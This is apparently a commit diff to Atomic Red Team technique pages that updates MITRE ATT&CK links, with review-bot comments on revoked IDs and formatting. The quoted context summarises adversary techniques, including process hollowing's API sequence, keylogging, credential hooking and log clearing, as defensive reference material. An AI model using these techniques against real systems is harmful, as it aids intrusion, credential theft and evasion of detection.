Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Endgame Process Injection July 2017)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1055 - Process Injection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055)
<blockquote>Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1056.001 - Keylogging
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/001)
<blockquote>Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
+1 -1
View File
@@ -1,5 +1,5 @@
# T1056.002 - GUI Input Capture
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/002)
<blockquote>Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). </blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1056.004 - Credential API Hooking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/004)
<blockquote>Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1057 - Process Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1057)
<blockquote>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1059.001 - PowerShell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/001)
<blockquote>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1059.002 - AppleScript
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/002)
<blockquote>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
<code>osascript</code> executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1059.003 - Windows Command Shell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/003)
<blockquote>Adversaries may abuse the Windows command shell for execution. The Windows command shell (<code>cmd.exe</code>) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1059.004 - Unix Shell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/004)
<blockquote>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1059.005 - Visual Basic
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.005)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
<blockquote>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1069.001 - Local Groups
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1069/001)
<blockquote>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1069.002 - Domain Groups
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1069/002)
<blockquote>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070.001 - Clear Windows Event Logs
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/001)
<blockquote>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070.002 - Clear Linux or Mac System Logs
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/002)
<blockquote>Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* <code>/var/log/messages:</code>: General and system-related messages
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070.003 - Clear Command History
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/003)
<blockquote>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070.004 - File Deletion
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/004)
<blockquote>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070.005 - Network Share Connection Removal
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.005)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/005)
<blockquote>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)</blockquote>
## Atomic Tests
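Review bot: the quoted description in this hunk still links `[Windows Admin Shares](https://attack.mitre.org/techniques/T1077)`, an ID that was revoked in the July 2020 sub-technique release in favor of T1021.002 (SMB/Windows Admin Shares). The link still resolves because attack.mitre.org redirects revoked IDs, so nothing in this change is broken, but it is worth a follow-up: either the generator is reading an older ATT&CK dataset than it should, or the upstream description text has not been updated, and the same URL rewrite applied in this commit does nothing for links embedded inside the quoted text.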
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070.006 - Timestomp
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.006)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/006)
<blockquote>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1070 - Indicator Removal on Host
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070)
<blockquote>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</blockquote>
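Review bot: same issue as the T1070.005 file above, in the unchanged context: `[Bash History](https://attack.mitre.org/techniques/T1139)` points at an ID revoked in the July 2020 sub-technique release and replaced by T1552.003 (Unsecured Credentials: Bash History). The redirect keeps the link working, but it is another sign the embedded ATT&CK text predates the sub-technique refactor. The grammatical slip "This that may compromise the integrity" is also upstream ATT&CK wording and should be fixed there, not here.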
+1 -1
View File
@@ -1,5 +1,5 @@
# T1071.001 - Web Protocols
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071/001)
<blockquote>Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1071.004 - DNS
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071/004)
<blockquote>Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1074.001 - Local Data Staging
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1074/001)
<blockquote>Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</blockquote>
## Atomic Tests
+1 -1
View File
@@ -1,5 +1,5 @@
# T1078.001 - Default Accounts
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1078.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1078/001)
<blockquote>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1082 - System Information Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1082)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1082)
<blockquote>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS <code>systemsetup</code> command, but it requires administrative privileges.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1083 - File and Directory Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1083)
<blockquote>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1087.001 - Local Account
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1087/001)
<blockquote>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code>on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file.</blockquote>
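Review bot: the context line has `<code>groups</code>on macOS` with no space after the closing tag, which renders as "groupson macOS"; the same missing space recurs in the T1087.002 file below (`<code>dscacheutil -q group</code>on macOS`). Both are in the quoted ATT&CK description rather than in the changed line, so they are upstream fixes, but if the generator post-processes the description text at all, normalizing whitespace after inline `</code>` tags would be a cheap way to keep the rendered pages readable regardless of the source data.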
+1 -1
View File
@@ -1,5 +1,5 @@
# T1087.002 - Domain Account
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1087/002)
<blockquote>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1090.001 - Internal Proxy
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1090/001)
<blockquote>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1095 - Non-Application Layer Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1095)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1095)
<blockquote>Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</blockquote>
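Review bot: for a parent technique the generator emits `https://attack.mitre.org/techniques/T1095` with no trailing segment, while sub-technique files in this diff get the `techniques/T1087/001` form, so the mapping from an ATT&CK ID to a URL path is branching on whether the ID contains a dot. That branch deserves a unit test in the generator covering both a plain `Txxxx` ID and a `Txxxx.yyy` ID, so a later refactor cannot quietly emit `techniques/T1095/` or `techniques/T1087.001` across a few hundred generated files.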
+1 -1
View File
@@ -1,5 +1,5 @@
# T1098 - Account Manipulation
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098)
<blockquote>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</blockquote>
## Atomic Tests
+1 -1
View File
@@ -1,5 +1,5 @@
# T1105 - Ingress Tool Transfer
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1105)
<blockquote>Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</blockquote>
## Atomic Tests
+1 -1
View File
@@ -1,5 +1,5 @@
# T1106 - Native API
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1106)
<blockquote>Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1110.001 - Password Guessing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/001)
<blockquote>Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1110.002 - Password Cracking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/002)
<blockquote>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</blockquote>
## Atomic Tests
+1 -1
View File
@@ -1,5 +1,5 @@
# T1110.003 - Password Spraying
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/003)
<blockquote>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
+1 -1
View File
@@ -1,5 +1,5 @@
# T1112 - Modify Registry
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1112)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1112)
<blockquote>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1113 - Screen Capture
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1113)
<blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
</blockquote>
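Review bot: the closing `</blockquote>` lands on its own line here, unlike every other hunk in this diff where it closes inline after the last sentence of the description; the source description for this technique evidently ends with a trailing newline. The generator should trim trailing whitespace from the description before wrapping it (or always emit `</blockquote>` inline) so the generated files are consistent and a mechanical change like this one stays a one-line diff per file.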
+1 -1
View File
@@ -1,5 +1,5 @@
# T1114.001 - Local Email Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1114/001)
<blockquote>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\<username>\Documents\Outlook Files` or `C:\Users\<username>\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1115 - Clipboard Data
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1115)
<blockquote>Adversaries may collect data stored in the clipboard from users copying information within or between applications.
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1119 - Automated Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1119)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1119)
<blockquote>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1123 - Audio Capture
